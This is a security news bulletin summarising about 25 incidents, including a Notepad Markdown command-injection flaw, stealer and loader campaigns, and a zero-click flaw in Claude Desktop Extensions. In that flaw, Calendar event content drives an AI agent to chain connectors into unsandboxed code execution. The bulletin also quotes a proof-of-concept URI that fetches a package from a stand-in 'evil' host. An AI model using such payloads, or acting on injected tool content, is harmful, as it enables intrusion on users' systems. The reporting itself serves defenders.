ThreatsDay Bulletin: AI Prompt RCE, Claude 0-Click, RenEngine Loader, Auto 0-Days & 25+ Stories

Microsoft Patches Notepad Flaw

Microsoft has addressed a critical command injection vulnerability (CVE-2026-20841, CVSS 8.8) in Windows Notepad that could enable remote code execution. The flaw allows attackers to execute arbitrary code by tricking users into clicking malicious links within Markdown files opened in Notepad.

"Improper neutralization of special elements used in a command ('command injection') in Windows Notepad App allows an unauthorized attacker to execute code over a network," Microsoft stated in its advisory.

Proof-of-concept exploits demonstrate that the vulnerability can be triggered through Markdown files containing "file://" links pointing to executable files or special URIs like "ms-appinstaller://?source=https://evil/xxx.appx". The issue was resolved in Microsoft's monthly Patch Tuesday update.

APT Pressure Intensifies on Taiwan

Taiwan has become a major target for advanced persistent threat (APT) operations, with TeamT5 tracking over 510 APT campaigns affecting 67 countries in 2025. Of these, 173 attacks specifically targeted Taiwan.

"Taiwan's role in geopolitical tensions and values in the global technology supply chain makes it uniquely vulnerable for adversaries who seek intelligence or long-term access to achieve political and military objectives," TeamT5 explained. The security vendor noted that Taiwan serves as a testing ground where China-nexus APT groups refine their tactics before deploying them elsewhere.

Node.js Stealer Hits Windows

A new Node.js information stealer called LTX Stealer has emerged, targeting Windows systems through heavily obfuscated Inno Setup installers. The malware conducts large-scale credential harvesting from Chromium-based browsers and targets cryptocurrency-related artifacts.

"The campaign relies on a cloud-backed management infrastructure, where Supabase is used exclusively as the authentication and access-control layer for the operator panel, while Cloudflare is leveraged to front backend services and mask infrastructure details," CYFIRMA reported.

Marco Stealer Expands Data Theft

Another Windows-oriented information stealer, Marco Stealer, first observed in June 2025, delivers via ZIP archive downloaders. It targets browser data, cryptocurrency wallet information, files from cloud services like Dropbox and Google Drive, and other sensitive system files.

"Marco Stealer relies on encrypted strings that are decrypted only at runtime to avoid static analysis. In addition, the information stealer uses Windows APIs to detect anti-analysis tools like Wireshark, x64dbg, and Process Hacker," Zscaler ThreatLabz noted. Stolen data is encrypted using AES-256 before being sent to command-and-control servers via HTTP POST requests.

Telegram Sessions Hijacked via OAuth Abuse

A new account takeover campaign has been observed abusing Telegram's native authentication workflows to obtain fully authorized user sessions. Victims are prompted to scan QR codes on bogus sites using the Telegram mobile application, initiating legitimate login attempts tied to attacker-controlled API credentials.

"Unlike traditional phishing attacks that rely solely on credential harvesting or token replay, this campaign leverages attacker-controlled Telegram API credentials and integrates directly with Telegram's legitimate login and authorization infrastructure," CYFIRMA explained. The attackers achieve complete session compromise while minimizing technical anomalies and user suspicion.

Discord Expands Global Age Checks

Discord has announced plans to require all users globally to verify their ages by sharing video selfies or providing government IDs to access certain content. The platform will implement an age inference model that runs in the background to help determine whether accounts belong to adults.

While Discord assures that video selfies don't leave users' devices and identity documents are "deleted quickly" after age confirmation, concerns persist following a security breach that exposed government IDs of 70,000 Discord users. The company confirmed that "a phased global rollout" would begin in "early March," defaulting all users globally to "teen-appropriate" experiences.

GuLoader Refines Evasion Tradecraft

Analysis of the GuLoader malware reveals it employs polymorphic code to dynamically construct constants during execution and exception-based control flow obfuscation to evade detection. The malware attempts to bypass reputation-based rules by hosting payloads on trusted cloud services like Google Drive and OneDrive.

First observed in December 2019, GuLoader primarily serves as a downloader for Remote Access Trojans (RATs) and information stealers, making it a persistent threat in the malware ecosystem.

$73.6M Pig-Butchering Scam Sentence

Daren Li, 42, a dual national of China and St. Kitts and Nevis, has been sentenced in absentia in the U.S. to 20 years in prison for his role in an international cryptocurrency investment scheme known as "pig butchering" or romance baiting that defrauded victims of over $73.6 million.

Li pleaded guilty in November 2024 but fled the country in December 2025 after cutting off his ankle monitor. The scheme involved establishing spoofed domains and websites resembling legitimate cryptocurrency trading platforms, tricking victims into investing after gaining their trust through professional or romantic relationships.

0-Click AI Prompt RCE Risk

A zero-click remote code execution vulnerability (CVSS 10.0) in Claude Desktop Extensions (DXT) could be exploited to silently compromise systems through simple Google Calendar events. The flaw stems from how MCP-based systems like Claude DXT autonomously chain together different tools and external connectors to fulfill user requests without enforcing proper security boundaries.

"Unlike traditional browser extensions, Claude Desktop Extensions run unsandboxed with full system privileges," the browser security company explained. "As a result, Claude can autonomously chain low-risk connectors (e.g., Google Calendar) to high-risk local executors, without user awareness or consent."

Anthropic has opted not to fix the issue at this time, despite it impacting more than 10,000 active users and 50 DXT extensions.

Data-Theft Ransomware Surges

A nascent ransomware group called Coinbase Cartel has claimed over 60 victims since emerging in September 2025. The group's operations are marked by data theft while leaving systems available rather than using encryptors that prohibit system access.

"Coinbase Cartel operations are marked by an insistence on stealing data while leaving systems available rather than complementing data theft with the use of encryptors that prohibit system access," Bitdefender reported. The healthcare, technology, and transportation industries represent major victim demographics.

Google Expands Privacy Takedowns

Google has expanded its "Results about you" tool to give users more control over sensitive personal information. The company added options to request removal of non-consensual explicit images and other details like driver's license numbers, passport numbers, and Social Security numbers.

"We understand that removing existing content is only part of the solution," Google stated. "For added protection, the new process allows you to opt in to safeguards that will proactively filter out any additional explicit results that might appear in similar searches."

Monitoring Tools Used for Ransomware

Threat actors have been observed leveraging Net Monitor, a commercial workforce monitoring tool, with SimpleHelp, a legitimate remote monitoring and management (RMM) platform, as part of attacks designed to deploy Crazy ransomware.

"In the cases observed, threat actors used these two tools together, using Net Monitor for Employees as a primary remote access channel and SimpleHelp as a redundant persistence layer, ultimately leading to the attempted deployment of Crazy ransomware," Huntress reported.

0APT Victim Claims Questioned

A threat actor called 0APT appears to be falsely claiming it has breached over 200 victims within a week since launching their data leak site on January 28, 2026. Analysis determined that the victims are a blend of fabricated generic company names and recognizable organizations that were not actually breached.

"0APT is likely operating in this deceptive manner in order to support extortion of uninformed victims, re-extortion of historical victims from other groups, defrauding of potential affiliates, or to garner interest in a nascent RaaS group," GuidePoint's Research and Intelligence Team said.

SYSTEM RCE via Named Pipe Flaw

A high-risk security vulnerability (CVE-2025-67813, CVSS 5.3) within Quest Desktop Authority could allow attackers to execute remote code with SYSTEM privileges. The named pipe exposes dangerous operations including arbitrary command execution, DLL injection, credential retrieval, and COM object invocation.

"Quest KACE Desktop Authority exposes a named pipe (ScriptLogic_Server_NamedPipe_9300) running as SYSTEM that accepts connections from any authenticated domain user over the network," NetSPI explained. Any authenticated user on the network can achieve remote code execution as a local administrator on hosts running the Desktop Authority agent.

Russia to Analyze Internet Traffic Using AI

Russia's internet watchdog will use artificial intelligence technology to analyze internet traffic and restrict the operation of VPN services, according to Forbes Russia. The Roskomnadzor is expected to spend close to $30 million to develop the internet traffic filtering mechanism this year.

The Russian government has blocked access to tens of VPN apps in recent years and maintains a registry of banned websites, demonstrating its commitment to controlling internet access within its borders.

Mispadu Expands Banking Attacks

Mispadu campaigns have been targeting Latin America, particularly Mexico and Brazil, with phishing emails containing HTML Application (HTA) attachments designed to bypass Secure Email Gateways. The banking trojan has expanded its target list to include banks outside Latin America as well as cryptocurrency-based exchanges.

"In all recent campaigns, Mispadu makes use of an AutoIT loader and various legitimate files to run the malicious content. Each step of the delivery chain from the attached PDF to the AutoIT script is dynamically generated," Cofense reported.

ScreenConnect Deployed via Phish

A phishing campaign has been documented delivering malicious .cmd attachments that escalate privileges, disable Windows SmartScreen, remove the mark-of-the-web to bypass security warnings, and ultimately install ConnectWise ScreenConnect.

The campaign has targeted organizations across the U.S., Canada, the U.K., and Northern Ireland, focusing on sectors with high-value data including government, healthcare, and logistics companies.

CrashFix Delivers SystemBC

A variant of the ClickFix attack called CrashFix has been used to deliver malicious payloads consistent with SystemBC malware. Unlike traditional ClickFix social engineering flows, this attack did not involve the use of a malicious browser extension.

"Instead, the victim was convinced to execute a command via the Windows Run dialog (Win+R) as seen with traditional ClickFix," Binary Defense explained. "This command abused a legitimate Windows binary -- finger.exe -- copied from System32, renamed, and executed from a user-writable directory."

76 Zero-Days Found in Cars

The third annual Pwn2Own Automotive competition held in Tokyo uncovered 76 unique zero-day vulnerabilities in various targets including in-vehicle infotainment systems (Tesla), electric vehicle chargers (Alpitronic HYC50, ChargePoint Home Flex), and car operating systems (Automotive Grade Linux).

Team Fuzzware.io won the hacking competition with total winnings of $215,000, followed by Team DDOS with $100,750 and Synactiv with $85,000.

Bing Ads Funnel Tech Scams

Malicious ads served on Bing search results when searching for sites like Amazon are being used to redirect unsuspecting users to tech support scam links hosted in Azure Blob Storage. The campaign targeted healthcare, manufacturing, and technology sectors in the U.S.

"Clicking on the malicious ad sent the victims to highswit[.]space, a newly registered domain hosting an empty WordPress site, which then redirected them to one of the Azure Blob Storage containers, which served a typical tech support scam site," Netskope Threat Labs reported.

Chinese VPN Infra Footprint Expands

A Chinese virtual private network provider named LVCHA VPN has been used by devices in Russia, China, Myanmar, Iran, and Venezuela. The provider has an Android app directly hosted on its website and distributed via the Google Play Store.

Analysis uncovered a cluster of nearly 50 suspicious domains, all promoting the same VPN, suggesting a coordinated effort to work around country-level firewalls in regions where they're trying to promote distribution.

Grid Attack Triggers Western Alerts

Following a late December 2025 coordinated cyber attack on Poland's power grid, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published a bulletin for critical infrastructure owners and operators. The attack highlighted vulnerabilities in edge devices and the importance of firmware verification.

"Operators should prioritize updates that allow firmware verification when available," CISA advised. "Operators should immediately change default passwords and establish requirements for integrators or OT suppliers to enforce password changes in the future."

Telnet Traffic Abruptly Collapses

Threat intelligence firm GreyNoise observed a steep decline in global Telnet traffic on January 14, 2026, six days before a security advisory for CVE-2026-24061 went public. The vulnerability relates to a critical flaw in the GNU InetUtils telnet daemon that could result in authentication bypass.

Data shows that the hourly volume of Telnet sessions dropped 65% on January 14 at 21:00 UTC, then fell 83% within two hours. Daily sessions have declined from an average of 914,000 to around 373,000, equating to a 59% reduction that has persisted.

New Loaders Fuel Stealer Campaigns

New previously undocumented malware loaders dubbed RenEngine Loader and Foxveil have been used to deliver next-stage payloads. The Foxveil malware campaign has been active since August 2025, while RenEngine Loader attacks have been operational since April 2025.

"RenEngine Loader decrypts, stages, and transfers execution to Hijack Loader, enabling rapid tooling evolution and flexible capability deployment," Cyderes explained. "By embedding a modular, stealth-focused second-stage loader inside a legitimate Ren'Py launcher, the attackers closely mimic normal application behavior, significantly reducing early detection."

Looker RCE Chain Disclosed

Two novel security vulnerabilities have been disclosed in Google Looker that could be exploited by an attacker to fully compromise a Looker instance. This includes a remote code execution chain via Git hook overrides and an authorization bypass flaw via internal database connection abuse.

"The vulnerabilities allowed users with developer permissions in Looker to access both the underlying system hosting Looker, and its internal database," Google stated. The flaws were patched in September 2025, though self-hosted Looker instances need to update to the latest supported version.

Trojanized 7-Zip Spreads Proxyware

A fake installer for the 7-Zip file archiver tool downloaded from 7zip[.]com (the legitimate domain is 7-zip[.]org) is being used to drop a proxy component that enrolls the infected host into a residential proxy node.

"The operators behind 7zip[.]com distributed a trojanized installer via a lookalike domain, delivering a functional copy of 7-Zip File Manager alongside a concealed malware payload," Malwarebytes reported. The campaign has been codenamed upStage Proxy.

AI-Built VoidLink Expands Reach

VoidLink is a sophisticated Linux-based command-and-control framework capable of long-term intrusion across cloud and enterprise environments. Analysis suggests it may have been developed by a Chinese-speaking developer using an artificial intelligence model with limited human review.

"It fingerprints cloud environments across AWS, GCP, Azure, Alibaba Cloud, and Tencent Cloud, harvesting credentials from environment variables, config directories, and instance metadata APIs," Ontinue reported. The malware includes plugins for container escape and Kubernetes privilege escalation.

The threat landscape continues to evolve with attackers leveraging legitimate tools, AI-powered development, and sophisticated evasion techniques. Defenders must adapt to recognize misuse of trusted systems and close gaps that don't appear dangerous on the surface.